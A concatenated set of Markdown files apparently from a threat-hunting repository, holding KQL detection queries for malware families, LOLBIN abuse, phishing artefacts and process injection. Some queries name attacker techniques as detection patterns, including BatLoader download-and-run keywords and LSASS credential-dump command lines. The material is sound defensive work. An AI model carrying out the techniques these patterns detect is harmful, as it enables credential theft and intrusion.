//Editors’ note: While the analysis and detection opportunities remain applicable, this threat page was written for a previous Threat Detection Report and has not been updated in 2022.
//Windows Installer (msiexec.exe) external network connections
//ATT&CK technique(s): T1218.007 Signed Binary Proxy Execution: Msiexec, T1055.012 Process Injection: Process Hollowing
//ATT&CK tactic(s): Defense Evasion, Command and Control
//Details: We observed Gamarue injecting into the signed Windows Installer msiexec.exe, which subsequently connected to C2 domains. Adversaries commonly use msiexec.exe to proxy the execution of malicious code through a trusted process. We detected Gamarue by looking for msiexec.exe without a command line making external network connections. Though many Gamarue C2 servers were disrupted in 2017, we found that some domains were active in 2020, like the one in the following example (4nbizac8[.]ru):
//source: https://redcanary.com/threat-detection-report/threats/gamarue/
// "External" is enforced explicitly via RemoteIPType so internal package servers do not surface. The "no command line" part of the
// analytic is not encoded here (MDE always records at least the image name); review InitiatingProcessCommandLine on the hits.
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "msiexec.exe" and isnotempty(RemoteUrl) and RemoteIPType =~ "Public"
```

## ROT13 registry modifications LNK file
```
//Bonus forensic analysis opportunity
//ROT13 registry modifications
//ATT&CK technique(s): T1112 Modify Registry
//ATT&CK tactic(s): Defense Evasion/Execution
//Details: While this isn’t a detection opportunity, we wanted to share a tip for how we identify the source LNK that executed Gamarue in many of our detections. 
We observed that the parent process of rundll32.exe (often explorer.exe) usually creates a registry value in the UserAssist subkey. UserAssist tracks applications that were executed by a user and encodes data using the ROT13 cipher. Because Gamarue is often installed by a user clicking an LNK file, if you’re trying to figure out the source of Gamarue, check out the registry key HKEY_USERS\{SID}\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist for any registry modifications ending in .yax—.yax is the ROT13 encoded value of .lnk. While this won’t be a good detection opportunity on its own, it could be helpful to look for this registry value if you’re responding to a Gamarue incident to figure out where it came from and clean the USB drive. 37 | //UserAssist values live under UserAssist\{GUID}\Count, so the key must be matched as a substring rather than with endswith (which never matched). The original also contained invisible zero-width characters inside the path literal. MDE records only a subset of registry keys in DeviceRegistryEvents - confirm UserAssist writes show up in your tenant before relying on this. 38 | DeviceRegistryEvents 39 | | where ActionType =~ "RegistryValueSet" and RegistryValueName endswith ".yax" and RegistryKey contains @"\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\" 40 | ``` 41 | 42 | -------------------------------------------------------------------------------- /ISO_MOTW_Kusto_Queries.md: -------------------------------------------------------------------------------- 1 | # ISO File and MOTW related attack behaviours 2 | 3 | `//ISO or Image Mount Indicator in Recent Files 4 | //https://github.com/SigmaHQ/sigma/blob/d459483ef6bb889fb8da1baa17a713a4f1aa8897/rules/windows/file_event/file_event_win_iso_file_recent.yml 5 | //https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ 6 | //https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore 7 | //https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/ 8 | //https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/ 9 | //Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in 
phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. 10 | DeviceFileEvents 11 | | where ((FolderPath endswith @'.iso.lnk' or FolderPath endswith @'.img.lnk' or FolderPath endswith @'.vhd.lnk' or FolderPath endswith @'.vhdx.lnk') and (FolderPath contains @'\Microsoft\Windows\Recent\'))` 12 | 13 | `//Suspicious VHD, VHDX, or ISO Image Download From Browser 14 | //Malware can use mountable Virtual Hard Disk .vhd, .vhdx, .iso file to encapsulate payloads and evade security controls 15 | //Legitimate user creation potentially someone working with virtualisation software, IT services or training related 16 | //confirm hash of original file and validate source e.g. the site it was downloaded from. 17 | //https://github.com/SigmaHQ/sigma/blob/d459483ef6bb889fb8da1baa17a713a4f1aa8897/rules/windows/file_event/file_event_win_iso_file_recent.yml 18 | //https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ 19 | //https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore 20 | //https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/ 21 | //https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files 22 | //Browsers typically download to a temporary name and then rename the file, so FileRenamed is included. The extension is tested on FileName: has_any on FolderPath matches whole terms (so '.iso' is effectively the term iso) and would also fire on directory names. The Internet Explorer image is iexplore.exe, not iexplorer.exe. 23 | DeviceFileEvents | where ActionType in~ ("FileCreated","FileRenamed") and ((InitiatingProcessFolderPath endswith @'chrome.exe' or InitiatingProcessFolderPath endswith @'firefox.exe' or InitiatingProcessFolderPath endswith @'microsoftedge.exe' or InitiatingProcessFolderPath endswith @'microsoftedgecp.exe' or InitiatingProcessFolderPath endswith @'msedge.exe' or InitiatingProcessFolderPath endswith @'iexplore.exe' or InitiatingProcessFolderPath endswith @'brave.exe' or InitiatingProcessFolderPath endswith @'opera.exe') and (FileName endswith @'.vhd' or FileName endswith @'.iso' or FileName endswith @'.vhdx'))` 24 | 25 | `//ISO Image Mount: Detects the mount of ISO images on an endpoint 26 | 
//https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore 26 | //https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages 27 | //https://twitter.com/MsftSecIntel/status/1257324139515269121 28 | //https://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/builtin/security/win_iso_mount.yml 29 | SecurityEvent 30 | | where ((EventID == 4663 and ObjectServer =~ @'Security' and ObjectType =~ @'File' and ObjectName contains @'\Device\CdRom') and (ObjectName !~ @'\Device\CdRom0\setup.exe'))` 31 | -------------------------------------------------------------------------------- /JavaScript_spawned_from_ISO.md: -------------------------------------------------------------------------------- 1 | # Queries from the Red Canary November Threat Blog: 2 | 3 | # JavaScript .js files executing from optical disc image ISOs 4 | `//Detection opportunity: JavaScript .js files executing from optical disc image ISOs 5 | //The following detection analytic identifies .js files executing from drives other than the default C:\ drive. Malware such as Qbot can be introduced through ISOs that contain malicious .js files. It is rare for .js files to execute from a drive other than the default drive. Since this may occur legitimately if the endpoint’s main partition is not on C:\: additional review may be needed to determine if this is malicious behavior. 
6 | // https://redcanary.com/blog/intelligence-insights-november-2022/ 7 | // In DeviceProcessEvents the process created for a double-clicked .js is wscript.exe (or cscript.exe) under C:\Windows, so filtering FileName for ".js" and FolderPath for a non-C: drive can never match; the script path has to be read from the command line instead. 8 | DeviceProcessEvents 9 | | where FileName in~ ("wscript.exe","cscript.exe") 10 | | where ProcessCommandLine matches regex @'(?i)"?[abd-z]:\\[^"]*?\.js("|\s|$)' 11 | | project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine` 12 | -------------------------------------------------------------------------------- /LOLBIN_MSHTA.md: -------------------------------------------------------------------------------- 1 | # LOLBIN - MSHTA 2 | 3 | ## MDE / Sentinel - network connections by MSHTA 4 | ``` 5 | //get original and renamed mshta.exe filenames (the PE version info keeps the original name even when the file on disk is renamed) 6 | let mshtaFiles = DeviceImageLoadEvents 7 | | where InitiatingProcessVersionInfoOriginalFileName =~ "mshta.exe" | distinct InitiatingProcessFileName; 8 | //mshta.exe creating a network connection 9 | DeviceNetworkEvents 10 | | where InitiatingProcessFileName in~ (mshtaFiles) and RemoteIPType =~ "Public" 11 | ``` 12 | 13 | ## MDE / Sentinel - MSHTA renamed 14 | 15 | ``` 16 | //mshta.exe executing under a file name other than mshta.exe (the previous version of this section repeated the network-connection query and never checked for a rename) 17 | DeviceProcessEvents 18 | | where ProcessVersionInfoOriginalFileName =~ "mshta.exe" and FileName !~ "mshta.exe" 19 | | project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, SHA256 20 | ``` 21 | 22 | ## MDE / Sentinel - MSHTA leveraging protocol handlers to execute code 23 | 24 | ``` 25 | //find mshta executing code via protocol handlers 26 | let protocolHandlers = dynamic(["javascript","vbscript","about"]); 27 | //get original and renamed mshta.exe filenames 28 | let mshtaFiles = DeviceImageLoadEvents 29 | | where InitiatingProcessVersionInfoOriginalFileName =~ "mshta.exe" | distinct 
InitiatingProcessFileName; 32 | DeviceProcessEvents 33 | | where ( InitiatingProcessFileName in~ (mshtaFiles) or FileName in~ (mshtaFiles) ) and ProcessCommandLine has_any (protocolHandlers) 34 | ``` 35 | 36 | ## MDE / Sentinel - MSHTA process execution with unusual process parent ancestry 37 | 38 | ``` 39 | // mshta process execution with unusual process parent ancestry 40 | //get original and renamed mshta.exe filenames 41 | let mshtaFiles = DeviceImageLoadEvents 42 | | where InitiatingProcessVersionInfoOriginalFileName =~ "mshta.exe" | distinct InitiatingProcessFileName; 43 | DeviceProcessEvents 44 | //look for suspicious process parent ancestry 45 | | where (InitiatingProcessFileName in~ (mshtaFiles) or FileName in~ (mshtaFiles)) and (InitiatingProcessParentFileName in~ ("PowerShell.exe","cmd.exe") or InitiatingProcessFileName in~ ("PowerShell.exe","cmd.exe")) 46 | ``` 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /LolBin_Winlogon_Suspicious_Network_Connection.md: -------------------------------------------------------------------------------- 1 | # LolBin Winlogon Suspicious Network Connection 2 | 3 | # Tactics: Execution 4 | 5 | # Source 6 | 7 | - https://twitter.com/ellishlomo/status/1652312221156794369?t=sx5lxEpNYrwjRUNWgytRdQ&s=19 8 | 9 | 10 | # Description 11 | 12 | Find Winlogon with outbound connections #MDE 13 | 14 | Kusto: 15 | 16 | 17 | ``` 18 | // winlogon.exe has no reason to talk to public IPs, so filter on the initiating process directly. The previous version filtered DeviceProcessEvents on an ActionType ("CreateRemoteThread") that table does not carry and then joined every public connection on the device by DeviceId alone, which cross-products unrelated connections with the winlogon row. 19 | DeviceNetworkEvents 20 | | where InitiatingProcessFileName =~ "winlogon.exe" and RemoteIPType == "Public" 21 | | project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessId, InitiatingProcessCommandLine, InitiatingProcessParentFileName 22 | ``` 23 | 24 | Remote-thread creation into winlogon.exe (a common precursor of an injected winlogon beaconing out) is recorded in DeviceEvents, not DeviceProcessEvents; in those rows FileName is the target process and InitiatingProcess* is the caller: 25 | 26 | ``` 27 | DeviceEvents 28 | | where ActionType == "CreateRemoteThreadApiCall" and FileName =~ "winlogon.exe" 29 | | project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountName 30 | ``` 31 | -------------------------------------------------------------------------------- /MDE_Execution_BatloaderTTPs.md: -------------------------------------------------------------------------------- 1 | # Batloader Execution Procedures 2 | 3 | ``` 4 | //Suspicious BatLoader Malware Execution by 
Use of Powershell (via cmdline) 5 | //https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html 6 | DeviceProcessEvents 7 | | where FileName endswith @'powershell.exe' and ProcessCommandLine has_all (@'\AppData\Roaming',@'Invoke-WebRequest','OutFile','update.bat','Start-Process') 8 | ``` 9 | 10 | ``` 11 | //Suspicious BatLoader Malware Execution by Use of Powershell (via cmdline) 12 | //https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html 13 | SecurityEvent 14 | | where EventID == 4688 15 | | where NewProcessName endswith @'\powershell.exe' and CommandLine has_all (@'\AppData\Roaming',@'Invoke-WebRequest','OutFile','update.bat','Start-Process') 16 | ``` 17 | 18 | ``` 19 | // Possible Batloader Malware Execution by Gpg4Win Tool (via process creation) 20 | // https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html 21 | SecurityEvent 22 | | where EventID == 4688 23 | | where NewProcessName endswith @'gpg2.exe' and CommandLine has_all (@'\AppData\Roaming',@'Invoke-WebRequest','OutFile','update.bat','Start-Process') 24 | ``` 25 | 26 | ``` 27 | // Possible Batloader Malware Execution by Gpg4Win Tool (via process creation) 28 | // https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html 29 | DeviceProcessEvents 30 | | where FileName endswith @'gpg2.exe' and ProcessCommandLine has_all (@'\AppData\Roaming',@'Invoke-WebRequest','OutFile','update.bat','Start-Process') 31 | ``` 32 | -------------------------------------------------------------------------------- /MasatdonC2_Kusto_Query.md: -------------------------------------------------------------------------------- 1 | # Mastodon used for C2 2 | 3 | # Instructions: 4 | Generate mastodon API bearer token to enumerate the servers to do this visit Mastodon instances at: https://instances.social/api/token# 5 | 6 | # Query to enumerate the API 7 | 8 | `curl -H 'Authorization: Bearer 
<YOUR_BEARER_TOKEN>' 'https://instances.social/api/1.0/instances/list?count=0' | jq ".instances[].name" | tr -d '"' > mastodon_servers.txt` 9 | 10 | # The bearer token is a personal API credential: generate your own, keep it out of source control, and revoke any token that has been committed or pasted publicly (the token that used to be hard-coded here should be treated as compromised). Upload the results to GitHub or a storage account etc. and then use the KQL `externaldata` operator to use the list in your query. Pin the URL to an immutable revision (a commit SHA rather than `main`) so that whoever controls the list cannot silently change what your hunt matches. 11 | 12 | # Example Hunt Query 13 | 14 | `let exclusions = datatable (filepattern:string)["mastodon.exe","Discord.exe","firefox.exe","msedge.exe","chrome.exe","telegram.exe","brave.exe","ExpressConnectNetworkService.exe","sidekick.exe"]; 15 | let mastodonServers1 = externaldata (domain:string)[@'https://raw.githubusercontent.com/m4nbat/mastodon_servers/main/mastodon_1-9999.txt']; 16 | let mastodonServers2 = externaldata (domain:string)[@'https://raw.githubusercontent.com/m4nbat/mastodon_servers/main/mastodon_10000-17175.txt']; 17 | // both halves of the list were fetched but only the second was used; union them. 18 | let mastodonServers = union mastodonServers1, mastodonServers2 | distinct domain; 19 | // optional extra IoC feed, e.g. let iocs = externaldata (ip:string, hash:string, domain:string)[@'https://my-external-lookup.com/ioc.csv']; then add "or RemoteUrl has_any (iocs)" to the filter below (the previous version referenced iocs while it was commented out, so the query did not compile). 20 | //to generate mastodon bearer token go here: https://instances.social/api/token# 21 | // to grab all mastodon servers use: curl -H 'Authorization: Bearer <YOUR_BEARER_TOKEN>' 'https://instances.social/api/1.0/instances/list?count=0' | jq ".instances[].name" | tr -d '"' > mastodon_servers.txt 22 | // TimeGenerated is the Sentinel column; in the MDE advanced hunting portal use Timestamp. 23 | DeviceNetworkEvents 24 | | where TimeGenerated > ago(14d) 25 | | where RemoteUrl has_any (mastodonServers) 26 | | where InitiatingProcessFileName !in~ (exclusions)` 27 | -------------------------------------------------------------------------------- /OneNote_Related_Hunting_Queries.md: -------------------------------------------------------------------------------- 1 | # OneNote spawning suspicious child processes 2 | The following pseudo-detection analytic identifies OneNote as a parent process for 
suspicious child processes. This is not a new type of analytic; historically they have been useful for detecting suspicious Excel child processes. The same type of logic can be leveraged to detect suspicious OneNote activity. This pseudo-analytic would need to be updated as adversaries change which processes they start with OneNote, so an alternative option would be to detect any child processes spawned from Office applications. 3 | 4 | ## OneNote spawning suspicious child processes 5 | The following detection analytic identifies OneNote as a parent process for suspicious child processes. This is not a new type of analytic; historically they have been useful for detecting suspicious Excel child processes. The same type of logic can be leveraged to detect suspicious OneNote activity. This pseudo-analytic would need to be updated as adversaries change which processes they start with OneNote, so an alternative option would be to detect any child processes spawned from Office applications. 6 | 7 | 8 | `//wscript.exe was unquoted (syntax error) and there is no jscript.exe host binary - JScript runs under wscript.exe/cscript.exe 9 | DeviceProcessEvents 10 | | where InitiatingProcessFileName =~ "onenote.exe" and FileName in~ ("cmd.exe","powershell.exe","wscript.exe","cscript.exe")` 11 | 12 | 13 | ## OneNote Url connections (can be noisy) good for frequency analysis or enriching with IoA / IoC data 14 | 15 | `DeviceEvents 16 | | where ActionType =~ "BrowserLaunchedToOpenUrl" and InitiatingProcessFileName in~ ("onenote.exe") and RemoteUrl !startswith @"C:\Users\"` 17 | 18 | 19 | ## Possible OneNote phishing using a shared link 20 | 21 | `let exclusionDomain = datatable(domain:string)["exampledomain.com"]; 22 | EmailEvents 23 | | join EmailUrlInfo on NetworkMessageId 24 | | where Url has_all ("my.sharepoint.com","personal") and Subject has_all ("shared") and SenderFromDomain !in~ (exclusionDomain);` 25 | -------------------------------------------------------------------------------- /PSExec_Process_Creation_Impacket_Metasploit.md: 
-------------------------------------------------------------------------------- 1 | # PsExec Process Creation (Metasploit / Impacket) 2 | 3 | ## Source: Cyborg / SIGMA 4 | 5 | ## T1569.002: System Services: Service Execution 6 | 7 | ## Sentinel 8 | 9 | `DeviceProcessEvents 10 | | where InitiatingProcessFileName has "services.exe" 11 | | where FolderPath matches regex "C:\\\\Windows\\\\[a-zA-Z]{8}.exe" 12 | | project TimeGenerated, DeviceName, ActionType, AccountName, AccountDomain, FileName, FolderPath, ProcessId, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessFolderPath, InitiatingProcessId, InitiatingProcessParentFileName, InitiatingProcessParentId, InitiatingProcessAccountDomain, InitiatingProcessAccountName, ProcessVersionInfoCompanyName, ProcessVersionInfoProductName, ProcessVersionInfoProductVersion, ProcessVersionInfoInternalFileName, ProcessVersionInfoOriginalFileName, ProcessVersionInfoFileDescription, FileSize, SHA256 13 | | order by TimeGenerated` 14 | 15 | `SecurityEvent 16 | | where ParentProcessName has "services.exe" 17 | | where NewProcessName matches regex "C:\\\\Windows\\\\[a-zA-Z]{8}.exe" 18 | | where EventID == "4688" 19 | | project EventID, NewProcessName, CommandLine, Computer, ParentProcessName` 20 | 21 | ## MDE 22 | 23 | `DeviceProcessEvents 24 | | where InitiatingProcessFileName has "services.exe" 25 | | where FolderPath matches regex "C:\\\\Windows\\\\[a-zA-Z]{8}.exe" 26 | | project Timestamp, DeviceName, ActionType, AccountName, AccountDomain, FileName, FolderPath, ProcessId, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessFolderPath, InitiatingProcessId, InitiatingProcessParentFileName, InitiatingProcessParentId, InitiatingProcessAccountDomain, InitiatingProcessAccountName, ProcessVersionInfoCompanyName, ProcessVersionInfoProductName, ProcessVersionInfoProductVersion, ProcessVersionInfoInternalFileName, ProcessVersionInfoOriginalFileName, 
ProcessVersionInfoFileDescription, FileSize, SHA256 27 | | order by Timestamp` 28 | -------------------------------------------------------------------------------- /PowerShell_create_LNK_in_startup.md: -------------------------------------------------------------------------------- 1 | # PowerShell creating LNK files within a startup directory 2 | 3 | # Source: https://redcanary.com/blog/intelligence-insights-december-2022/ 4 | 5 | `//PowerShell creating LNK files within a startup directory 6 | //The following detection analytic identifies PowerShell creating LNK files in a startup directory. Malware like Yellow Cockatoo can be introduced as a fake installer binary, resulting in malicious PowerShell script execution. Some benign homegrown utilities or installers may create .lnk files in startup locations, so additional investigation of the activity may be necessary. 7 | //https://redcanary.com/blog/intelligence-insights-december-2022/ 8 | let trusedUtilsInstallingLnkInStartup = datatable (util:string)["mytrustedutility.exe"]; 9 | DeviceFileEvents 10 | | where ActionType =~ "FileCreated" and InitiatingProcessFileName =~ "powershell.exe" and FolderPath contains @"start menu\programs\startup" and not(InitiatingProcessCommandLine has_any (trusedUtilsInstallingLnkInStartup))` 11 | -------------------------------------------------------------------------------- /Raspberry_Robin_Kusto_Queries.md: -------------------------------------------------------------------------------- 1 | # Raspberry Robin Hunts 2 | 3 | # RaspeberryRobin detect msiexec.exe downloading and executing packages 4 | `//RaspeberryRobin detect msiexec.exe downloading and executing packages 5 | // https://redcanary.com/blog/raspberry-robin/ 6 | DeviceProcessEvents 7 | | where (InitiatingProcessFileName =~ "msiexec.exe" or FileName =~ "msiexec.exe") 8 | | where ProcessCommandLine has_any ("http:","https:") and (ProcessCommandLine contains '/q' or ProcessCommandLine contains '-q')` 9 | 10 | # 
RaspeberryRobin detect a legitimate Windows utility, fodhelper.exe, which in turn spawns rundll32.exe to execute a malicious command. 11 | `//RaspeberryRobin detect a legitimate Windows utility, fodhelper.exe, which in turn spawns rundll32.exe to execute a malicious command. Processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt. It is unusual for fodhelper.exe to spawn any processes as the parent, making this another useful detection opportunity. 12 | // https://redcanary.com/blog/raspberry-robin/ 13 | DeviceProcessEvents 14 | | where InitiatingProcessParentFileName =~ "fodhelper.exe" 15 | | project DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine` 16 | 17 | # RaspeberryRobin Detect the Windows Open Database Connectivity utility loading a configuration file or DLL. 18 | `//RaspeberryRobin Detect the Windows Open Database Connectivity utility loading a configuration file or DLL. The /A flag specifies an action, /F uses a response file, and /S runs in silent mode. Odbcconf.exe running rgsvr actions in silent mode could indicate misuse. 
19 | // https://redcanary.com/blog/raspberry-robin/ 20 | DeviceProcessEvents 21 | | where (FileName =~ "odbcconf.exe" or InitiatingProcessFileName =~ "odbcconf.exe") and (ProcessCommandLine contains "regsvr") 22 | | where (ProcessCommandLine contains '/f' or ProcessCommandLine contains '-f' or ProcessCommandLine contains '/a' or ProcessCommandLine contains '-a' or ProcessCommandLine contains '/s' or ProcessCommandLine contains '-s')` 23 | 24 | # RaspberryRobin detect network connections from the command line with no parameters 25 | `//RaspberryRobin detect network connections from the command line with no parameters 26 | // https://redcanary.com/blog/raspberry-robin/ 27 | //The file names need the .exe suffix ("rundll32" and "dllhost" never matched). The command line typically still carries the image name even when no arguments were passed, so strip the image token before testing for "no parameters" rather than comparing the whole command line to "". 28 | DeviceNetworkEvents 29 | | where RemoteIPType =~ "Public" and InitiatingProcessFileName in~ ("regsvr32.exe","rundll32.exe","dllhost.exe") 30 | | extend Args = extract(@'(?i)^\s*"?[^"]*?\.exe"?\s*(.*)$', 1, InitiatingProcessCommandLine) 31 | | where isempty(InitiatingProcessCommandLine) or isempty(Args)` 32 | -------------------------------------------------------------------------------- /RedCanary2023-ObfuscatedFilesorInfo.md: -------------------------------------------------------------------------------- 1 | # Red Canary Threat Report - Obfuscated Files and Information 2 | 3 | **Source:** https://redcanary.com/threat-detection-report/techniques/obfuscated-files-information/ 4 | 5 | **Experimental hunting queries based on Red Canary threat report (Untested)** 6 | 7 | ## Detecting Base64 encoding 8 | If you’re looking to detect malicious use of Base64 encoding, consider monitoring for the execution of processes like powershell.exe or cmd.exe along with command lines containing parameters like ToBase64String and FromBase64String. 9 | 10 | 11 | **Pseudocode:** process == ('powershell.exe' || 'cmd.exe') && command_includes ('base64') 12 | 13 | **Kusto:** 14 | `DeviceProcessEvents 15 | | where FileName in~ ("powershell.exe","pwsh.exe","cmd.exe") and ProcessCommandLine has_any ("FromBase64String","ToBase64String")` 16 | 17 | 18 | ## PowerShell -EncodedCommand switch 19 | Use of the -EncodedCommand PowerShell switch represents the most common form of obfuscation that we detect across the environments we monitor. 
19 | 20 | **Pseudocode:** process == powershell.exe && command_includes [any variation of the encoded command switch]* 21 | 22 | **Kusto:** 23 | 24 | `//has_any matches whole terms and ignores punctuation, so has_any("-e", ...) was in effect a search for the term "e" anywhere in the command line. Anchor the switch with a regex instead; PowerShell accepts any unambiguous prefix of -EncodedCommand as well as -ec, and a / prefix. 25 | DeviceProcessEvents 26 | | where FileName in~ ("powershell.exe","pwsh.exe") and ProcessCommandLine matches regex @'(?i)(^|\s)[-/](e(n(c(o(d(e(d(c(o(m(m(a(n(d)?)?)?)?)?)?)?)?)?)?)?)?)?|ec)(\s|$)'` 27 | 28 | ## Escape characters 29 | Consider alerting on command lines containing excessive use of characters associated with obfuscation, like `^= % ! [ ( ;. 30 | 31 | **Pseudocode:** process == cmd.exe && command_includes [excessive use of the following] ('^' || '=' || '%' || '!' || '[' || '(' || ';') 32 | 33 | **Kusto:** 34 | 35 | `//countof() has to be applied to the command-line column; the previous version counted characters inside a fixed literal string and never looked at the event. The threshold of 4 is arbitrary - tune it per environment. 36 | DeviceProcessEvents 37 | | where InitiatingProcessFileName endswith "cmd.exe" or FileName endswith "cmd.exe" 38 | | extend a = countof(ProcessCommandLine, '^'), b = countof(ProcessCommandLine, '='), c = countof(ProcessCommandLine, '%'), d = countof(ProcessCommandLine, '!'), e = countof(ProcessCommandLine, '['), f = countof(ProcessCommandLine, '('), g = countof(ProcessCommandLine, ';') 39 | | extend suspiciousChars = a + b + c + d + e + f + g 40 | | where suspiciousChars > 4` 41 | 42 | 43 | ## ZIP file spawning JavaScript 44 | We’ve detected high volumes of obfuscation this year looking for apparent phishing schemes where adversaries conceal JavaScript payloads in ZIP files and write them to the users and temp directories. 
39 | 40 | **Pseudocode:** process == 'wscript.exe' && command_includes ('users' && 'temp' && '.zip' && '.js') && 41 | has_external_netconn 42 | 43 | **Kusto:** 44 | 45 | `//the pseudocode ANDs all four terms, so has_all rather than has_any 46 | DeviceNetworkEvents 47 | | where InitiatingProcessFileName =~ "wscript.exe" and InitiatingProcessCommandLine has_all ('users','temp','.zip','.js') and ipv4_is_private(RemoteIP) == false` 48 | 49 | `DeviceFileEvents 50 | | where ActionType =~ "FileCreated" and FolderPath has_any ("temp","users") and FileName endswith ".js"` 51 | 52 | -------------------------------------------------------------------------------- /RedCanary2023-ProcessInjection.md: -------------------------------------------------------------------------------- 1 | # Process Injection 2 | Process Injection continues to be a versatile tool that adversaries lean on to evade defensive controls and gain access to sensitive systems and information. 3 | 4 | ## Source 5 | https://redcanary.com/threat-detection-report/techniques/process-injection/ 6 | 7 | ## Kusto Queries 8 | 9 | ### PowerShell injecting into anything 10 | `//In DeviceEvents API-call rows FileName is the target process and InitiatingProcess* is the caller, so "PowerShell injecting" is a filter on the initiating process; both directions are kept so the AV / MDE-sensor exclusions (which only make sense when PowerShell is the target being scanned) stay meaningful. in/!in accept only a single-column tabular expression, so the two-column exclusions datatable did not compile and is split into a name list plus folder-prefix checks. 11 | let excludedProcesses = datatable (processFileName:string)["MsMpEng.exe","MsSense.exe"]; 12 | DeviceEvents 13 | | where ActionType =~ "ReadProcessMemoryApiCall" and (InitiatingProcessFileName in~ ("powershell.exe","pwsh.exe") or FileName in~ ("powershell.exe","pwsh.exe")) 14 | | where InitiatingProcessFileName !in~ (excludedProcesses) 15 | | where not(InitiatingProcessFolderPath startswith @"C:\ProgramData\Microsoft\Windows Defender\Platform\") and not(InitiatingProcessFolderPath startswith @"C:\Program Files\Windows Defender Advanced Threat Protection")` 16 | 17 | ### Process executing sans command lines 18 | One major tell for process injection is the absence of command lines. Detecting the absence of anything, including a command line, can be tricky, and this pseudo-analytic only works for processes where you expect corresponding commands. However, you may be able to iterate on the following amalgamation of detection logic to improve detection coverage. 
17 | 18 | `DeviceProcessEvents 19 | | where FileName in ('backgroundtaskhost.exe', 'svchost.exe', 'dllhost.exe', 'werfault.exe', 'searchprotocolhost.exe', 'wuauclt.exe', 'spoolsv.exe', 'rundll32.exe', 'regasm.exe', 'regsvr32.exe', 'regsvcs.exe') 20 | //regex to extract the commandline following a windows binary as MDE commandline field usually contains "123.exe" or '123.exe' or 123.exe followed by a command. 21 | | where ProcessCommandLine matches regex "(['\"]?\\w+\\.exe['\"]?)(\\s+.+)?$" 22 | //regex to extract the commandline after the .exe 23 | | extend CommandLineArgs = extract("(['\"]?\\w+\\.exe['\"]?)(\\s+.+)?$", 2, ProcessCommandLine) 24 | | where isempty(CommandLineArgs)` 25 | 26 | ### Network connections where there shouldn’t be 27 | Detecting purely on processes making network connections has the potential to generate a torrent of false positives. However, it can also identify suspicious injection activity—particularly if you tune the logic to filter out the eccentricities in your specific environment. 28 | 29 | `let FileNames = datatable(name:string)["notepad.exe","calc.exe"]; 30 | DeviceNetworkEvents 31 | | where InitiatingProcessFileName in~ (FileNames)` 32 | 33 | 34 | ### Injection into LSASS 35 | Since injection into lsass.exe is common, impactful, and frequently suspicious, it deserves to be called out individually. To that point, it would be worth your time to determine and enumerate the processes in your environment that routinely or occasionally obtain a handle to lsass.exe. Any access outside of the baseline should be treated as suspicious. 
36 | 37 | `let exclusions = datatable (processFileName:string,processFolderPath:string)["healthservice.exe",@"C:\Program Files\Microsoft Monitoring Agent\Agent", 38 | "MsMpEng.exe",@"C:\ProgramData\Microsoft\Windows Defender\Platform\","MsSense.exe",@"C:\Program Files\Windows Defender Advanced Threat Protection"]; 39 | DeviceEvents 40 | | where ActionType =~ "ReadProcessMemoryApiCall" and FileName =~ "lsass.exe" and (InitiatingProcessFileName !in~ (exclusions) and InitiatingProcessFolderPath !in~ (exclusions))` 41 | 42 | ### Suspected LSASS Dump 43 | 44 | `DeviceProcessEvents 45 | | where InitiatingProcessCommandLine has_all ("procdump", "lsass") or InitiatingProcessCommandLine has_all ("rundll32", "comsvcs", "MiniDump")` 46 | 47 | ### Use to look for unusual cross process injection 48 | 49 | `let lolbins = datatable (file:string)["rundll32.exe","MSbuild.exe","PowerShell.exe","Wscript.exe","Cscript.exe","Msiexec.exe","Rundll32"]; 50 | DeviceEvents 51 | | where ActionType =~ "ReadProcessMemoryApiCall" and InitiatingProcessFileName in~ (lolbins)` 52 | 53 | 54 | -------------------------------------------------------------------------------- /RedCanary2023-ServiceExecution.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /RedCanary2023_IngressToolTransfer.md: -------------------------------------------------------------------------------- 1 | # Ingress Tool Transfer 2 | After gaining a foothold in a victim environment, adversaries often deploy non-native tools for lateral movement and other post-exploitation activity. 3 | 4 | ## Source: https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/ 5 | 6 | ## 